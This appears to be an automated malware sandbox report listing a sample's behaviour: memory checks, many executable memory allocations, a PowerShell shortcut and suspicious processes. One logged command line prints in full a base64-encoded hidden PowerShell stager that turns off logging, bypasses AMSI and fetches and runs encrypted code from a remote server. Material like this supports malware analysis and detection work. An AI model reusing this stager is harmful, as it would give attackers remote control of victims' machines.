CryptExportKey July 4, 2024, 5:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00645008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 4, 2024, 5:05 p.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml

Allocates read-write-execute memory (usually to unpack itself) (50 out of 249 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f20000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a73000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a78000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a7f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 5:05 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA==

cmdline

powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwA